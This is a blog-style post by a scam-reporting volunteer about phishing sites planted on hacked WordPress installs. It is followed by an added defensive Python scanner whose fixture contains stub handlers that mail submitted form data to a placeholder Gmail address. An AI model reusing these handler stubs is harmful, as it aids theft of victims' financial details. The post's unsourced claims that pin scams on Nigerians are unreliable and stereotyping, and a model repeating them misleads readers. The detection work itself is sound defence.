A few things I've noticed in the past year or so.
a) Cotonou, in the Benin Republic, is the new Nigeria. 90% of Nigerian scams now originate from this city.
b) Nigerians are branching out into phishing, and have been doing this for months.
For that second point, a pattern I've been documenting and reporting to ISPs is as follows:
- A Nigerian criminal with a bunch of (usually) old lists of emails decides he wants to operate a series of phishing sites.
- He purchases access to several hacked WordPress sites.
- The hacked sites have all been compromised by (usually, so far) a Ukrainian hacker with knowledge of how to compromise WordPress, Joomla and other CMS systems.
- The Nigerian is provided with access to a PHP "shell" script that offers nearly complete control over the compromised web server.
- The Nigerian uploads their own files for the phishing attack. These are rudimentary sites which the Nigerian in all likelihood did not code on their own. They may have purchased them from the same Ukrainian hacker.
- They use (usually) several throw-away Gmail accounts to receive the financial details of the victims who actually enter their information into these forms.
- The average phishing site that has been set up in this way is typically hosted on an abandoned domain, which usually means it takes anywhere from days to weeks to get shut down.
- Most hosting companies simply do not see this as a serious issue. They blame their customers for setting up and abandoning an old install of WordPress, which was their own fault, so they don't fix it.
On average, of the sites that have been willing to share log information or a summary of that information, the typical phishing site gathers 100 - 150 "leads" (stolen personal data profiles).
Every month I am personally sent 20 - 30 of these. Some of these Nigerians send the same list up to eight notifications every day. What kind of imbecile would actually believe that PayPal would send them eight notifications a day that their account was once again "compromised"? Or Wells Fargo? Or Citibank? Or Apple?
As it turns out: quite a few. A lot of these sites usually have multiple entries from the same individual.
So now you know. From my experience there is no stopping this kind of criminal activity. My reporting does slow it down, but there's no way to ever stop it. People are extremely gullible.
SiL / IKS / concerned citizen
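
A defender-side check for the pattern described in the post above, as an added example that is not part of the original post: a site owner or hosting provider can sweep a web root for PHP files that match it. The heuristics are assumptions, not details from the post: that WordPress media directories (`wp-content/uploads`) normally hold no PHP, and that the uploaded form handler forwards submitted fields with PHP `mail()` to a hard-coded Gmail address. The file tree and address are constructed samples.

```python
import re
import tempfile
from pathlib import Path

# Assumption: the planted handler mails form fields to a hard-coded Gmail
# address. The post only says throw-away Gmail accounts receive the data.
FREEMAIL = re.compile(rb"[\w.+-]+@gmail\.com", re.I)
READS_FORM = re.compile(rb"\$_(POST|REQUEST)\b")
SENDS_MAIL = re.compile(rb"\bmail\s*\(", re.I)

def scan_webroot(root):
    """Return {relative_path: [reasons]} for suspicious .php files under root."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        reasons = []
        # Assumption: media upload directories should never contain PHP.
        if "/uploads/" in f"/{rel}":
            reasons.append("php-in-uploads")
        if READS_FORM.search(data) and SENDS_MAIL.search(data) and FREEMAIL.search(data):
            reasons.append("form-data-mailed-to-freemail")
        if reasons:
            findings[rel] = reasons
    return findings

def build_sample(root):
    """Constructed sample tree: two benign theme files, two planted handlers."""
    files = {
        "wp-content/themes/basic/functions.php":
            b"<?php add_action('init', 'basic_setup'); ?>",
        "wp-content/themes/basic/contact.php":
            b"<?php mail(get_option('admin_email'), 'Contact', $_POST['msg']); ?>",
        "wp-content/uploads/old/secure/login.php":
            b"<?php $to='constructed-sample@gmail.com'; mail($to,'x',$_POST['f']); ?>",
        "verify/index.php":
            b"<?php MAIL ('constructed-sample@GMAIL.com','x',$_REQUEST['f']); ?>",
    }
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reasons in scan_webroot(tmp).items():
            print(rel, ", ".join(reasons))
```

A hit is a lead for manual review, not proof: a legitimate contact form can mail a Gmail address, and a handler that sends the data some other way will not match.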